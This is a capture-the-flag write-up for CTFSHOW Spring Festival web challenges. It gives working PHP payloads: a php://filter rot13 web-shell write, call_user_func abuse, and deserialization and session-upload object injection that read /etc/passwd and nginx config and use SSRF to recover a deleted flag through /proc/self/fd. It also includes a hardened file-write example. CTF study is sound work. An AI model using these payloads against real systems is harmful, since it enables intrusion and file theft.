CTFSHOW Daily Practice - Spring Festival Fun Contest
Bought two months of membership...
Warm-up
It is obviously a one-liner web shell, but searching for flag directly finds nothing; find is needed here.
Searching for flag directly finds nothing, so search for secret instead; it is found, then cat secret.php.
web1
This is a write function that takes a single parameter: the parameter content is used as the filename to write to, and the data written is an exit statement followed by content.
For example, if content is test.php:
file_put_contents('test.php', '<?php exit();' . 'test.php');
then <?php exit(); followed by the filename test.php is written into test.php.
Here a pseudo-protocol (the php://filter stream wrapper) and rot13 are used to neutralize the exit statement:
php://filter/write=string.rot13|<?cuc cucvasb();?>/resource=shell.php
payload
?content=php://filter/write=string.rot13|<?cuc%20riny(%27flfgrz(yf);%27);?>|/resource=shell.php
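As an added example (not the challenge's code), the vulnerable write pattern next to a hardened version; the target directory and the filename rule are assumptions:

```php
<?php
// Added example, not the challenge's own code. Shows why prefixing "<?php exit();"
// gives no protection when the caller also controls the destination path, and one
// way to harden the write. Directory layout and the filename rule are assumptions.

// Vulnerable pattern from the challenge: $content is both the destination path and
// the written data. A php://filter path with write=string.rot13 applies the filter
// to the prefix too, turning "<?php exit();" into "<?cuc rkvg();", which is no
// longer an exit() call, while the rot13-encoded body decodes to live code.
function vulnerable_write(string $content): void
{
    file_put_contents($content, '<?php exit();' . $content);
}

// Hardened version: the destination is a fixed directory plus a validated basename,
// so stream wrappers (php://, data:, phar://) and path traversal are never
// interpreted, and only a non-executable extension is allowed.
function safe_write(string $dir, string $name, string $data): string
{
    // A plain basename only: wrappers and traversal need ':' or '/', which the
    // character class rejects. \A and \z avoid the trailing-newline leniency of '$'.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        throw new InvalidArgumentException('invalid file name');
    }
    $path = $dir . DIRECTORY_SEPARATOR . $name;
    if (file_put_contents($path, $data, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $path;
}

// Constructed input in the shape of the challenge payload, plus a legitimate name.
$attack = 'php://filter/write=string.rot13|<?cuc riny(...);?>/resource=shell.php';
try {
    safe_write(sys_get_temp_dir(), $attack, 'ignored');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
echo safe_write(sys_get_temp_dir(), 'notes.txt', "hello\n"), "\n";
```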
web2
Here call_user_func is required to execute the first POST parameter and the return value must be Happynewyear. But call_user_func treats the parameter as a function to call, and this is the only function involved, so we need a zero-argument function whose return value is Happynewyear.
Looking at the challenge, there is a session_start(); so we can use session_id, which returns the value of PHPSESSID, and we set PHPSESSID to Happynewyear.
Pass session_id=session_id: key($_POST) is then the name of the first POST parameter, session_id, and looking up the value under the parameter name session_id still gives session_id, so what call_user_func finally executes is session_id.
web3
The parameter passed via 1 is executed as a function and its return value must equal Happynewyear. Note that this is two equals signs rather than three, so returning true is enough; we can pass session_start.
web4
Here the parameter passed via 1 is executed as a function and its return value is used as the filename of the one-liner web shell. For the PHP shell to be parsed, the filename must end in .php.
Flipping through the manual, we can find one.
After passing it in, visit .inc,.php.
web5
Pass in a huge number of "hu" to make PHP error out, so that the 🐯 file is not overwritten, then visit 🐯 to download it.
Note that too many "hu" makes the upload fail with a file-too-large message, while too few does not make PHP error. Concretely, passing 524280 "hu" works.
web6
A deserialization escape; note that file can be rewritten to adjust the position and so on.
The filename of the flag file read by the deserialization is unknown; from the challenge it looks like we need to check the server's records, so read /etc/nginx/nginx.conf.
payload
get
http://54b105fb-0495-49a9-b721-a6355f689986.challenge.ctf.show/?POST=GET
post
GET[_SESSION][a]=daniudaniuctfshowhappyhuyearhappyhuyearhappyhuyear&GET[_SESSION][file]=1&GET[_SESSION][b]=;s:1:"a";s:1:"a";s:4:"file";s:28:"L2V0Yy9uZ2lueC9uZ2lueC5jb25m
web7
First look at class.php (no screenshot here); it looks like we are meant to build a deserialization chain.
Note that there is no obvious place to pass parameters, but notice ini_set("session.serialize_handler", "php");, which can be used to pass them in.
I will not explain the principle of this deserialization in detail here; the deserialization chain is simple as well.
POST /index.php HTTP/1.1
Host: 16db4afd-14bb-47ba-b3ee-79411fadb58e.challenge.ctf.show
Content-Length: 511
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17cc9de90647a-0dbb54e8c1219f-57b193e-1fa400-17cc9de9065461; PHPSESSID=15143f3af002c491a8d476cf76cdda0a
Connection: close

------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
Content-Disposition: form-data; name="file"; filename="|O:5:\"Happy\":1:{s:5:\"happy\";O:5:\"_New_\":4:{s:5:\"daniu\";O:4:\"Year\":1:{s:6:\"zodiac\";s:11:\"/etc/passwd \";}s:5:\"robot\";s:10:\"I'm robot.\";s:8:\"notrobot\";s:16:\"I'm not a robot.\";s:12:\"_New__New_\";N;}}"
Content-Type: text/plain

q
------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2--
Send the request as above.
Next is locating the flag; try brute-forcing the process id.
Notice that process 114 is a python process; read it.
from flask import *
import os

app = Flask(__name__)
flag = open('/flag', 'r')  # I deleted the flag
os.remove('/flag')


@app.route('/', methods=['GET', 'POST'])
def index():
    return "flag我删了,你们别找了"


@app.route('/download/', methods=['GET', 'POST'])
def download_file():
    return send_file(request.args['filename'])


if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=False)
So the flag is deleted right after the process reads it; try looking for it in /proc/self/fd/.
At first I downloaded from /proc/114/fd/ and found that it could not be downloaded.
Later I noticed that file_get_contents() can read resources over the http protocol, so try reading that way.
Final payload
POST /index.php HTTP/1.1
Host: 16db4afd-14bb-47ba-b3ee-79411fadb58e.challenge.ctf.show
Content-Length: 556
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17cc9de90647a-0dbb54e8c1219f-57b193e-1fa400-17cc9de9065461; PHPSESSID=15143f3af002c491a8d476cf76cdda0a
Connection: close

------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2
Content-Disposition: form-data; name="file"; filename="|O:5:\"Happy\":1:{s:5:\"happy\";O:5:\"_New_\":4:{s:5:\"daniu\";O:4:\"Year\":1:{s:6:\"zodiac\";s:56:\"http://127.0.0.1:5000/download/?filename=/proc/self/fd/3 \";}s:5:\"robot\";s:10:\"I'm robot.\";s:8:\"notrobot\";s:16:\"I'm not a robot.\";s:12:\"_New__New_\";N;}}"
Content-Type: text/plain

q
------WebKitFormBoundaryMqSj2Tz8AxR9Q8s2--